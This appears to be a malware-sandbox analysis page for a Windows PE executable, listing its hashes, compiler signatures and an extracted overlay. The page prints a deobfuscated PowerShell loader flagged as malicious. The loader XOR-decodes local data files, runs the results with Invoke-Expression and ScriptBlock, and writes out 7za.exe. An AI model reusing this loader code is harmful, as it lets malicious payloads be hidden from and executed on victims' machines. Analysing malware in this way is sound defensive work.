2eb933d559c31066afbc930757b884a7

PE Executable
|
MD5: 2eb933d559c31066afbc930757b884a7
|
Size: 2.35 MB
|
application/x-dosexec

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	2eb933d559c31066afbc930757b884a7
Sha1	cb7ac5e5e329336f1c4ac70918d4c11040745c82
Sha256	3cd2ca1a45a96733269d60397d84b451e4b4f0b7f7cdc3c152bf9e88db773199
Sha384	e170c7086a3a5acdd335ec01f5ea05706ae0e976d58281f9bdf5d613e28bd6768f740e2f5aa2d8ad2cc5cc23de91c37a
Sha512	aaa43afece1525b86b2161509cd89068395edaab28afe27bc9ae8f6cf027bab78e5d0dbb9c1c75ca059e98187e39c188ea1bb3c0ee93c1de3c3d30170021adf7
SSDeep	49152:xgwRWCatzqbMLZRRmz4RC8QvCI9BsNapVi4BMY82IrE3rz2oSeYL:xgwR2qbMrRG4RCfvCI9BsuVi4WDrazOL
TLSH	92B533017BF884F1E2AC2C7851A126A296B9ADA2073641D3D7513DC295B32F0E73F7D9

PeID

Microsoft Visual C++

Microsoft Visual C++ 5.0

Microsoft Visual C++ 6.0 DLL (Debug)

Microsoft Visual C++ v6.0

Microsoft Visual C++ v6.0 DLL

File Structure

Informations

Name0	Value
Info	PE Detect: PeReader OK (file layout)
Info	Overlay extracted: Overlay_adf99851.bin (2205629 bytes)

Artefacts

Name0	Value
Deobfuscated PowerShell	@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data \| ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 26350 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 26350 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 26350 [File]::"WriteAllBytes"("7za.exe", $encodedData)

Name0

Value

Deobfuscated PowerShell

2eb933d559c31066afbc930757b884a7 (2.35 MB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
Deobfuscated PowerShell	@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data \| ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 26350 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 26350 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 26350 [File]::"WriteAllBytes"("7za.exe", $encodedData) Malicious	2eb933d559c31066afbc930757b884a7 > 7z-stream @ 0x00022CA1.7z > setup.cmd

You must be signed in to post a comment.